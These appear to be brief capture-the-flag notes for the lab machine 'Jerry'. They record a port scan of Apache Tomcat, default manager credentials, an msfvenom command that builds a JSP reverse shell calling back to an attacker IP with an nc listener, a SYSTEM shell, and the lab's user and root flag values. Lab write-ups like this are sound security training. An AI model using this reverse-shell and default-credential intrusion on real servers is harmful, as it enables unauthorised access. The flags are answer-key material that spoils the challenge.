Jerry   10.10.10.95

[+]Enumeration[+]
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Apache Tomcat/7.0.88
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1



http://10.10.10.95
/docs
/examples

http://10.10.10.95:8080/manager/html
[*]Default credentials 
Username : tomcat
Password : s3cret

[+]Intrusion
MSFVenom Reverse Shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.24 LPORT=4444 -f war -o revshell.war

nc -lvnp 4444

C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system

[+]Flags
Directory of C:\Users\Administrator\Desktop\flags

C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"

user.txt
7004dbcef0f854e0fb401875f26ebd00

root.txt
04a8b36e1545a455393d067e772fe90e
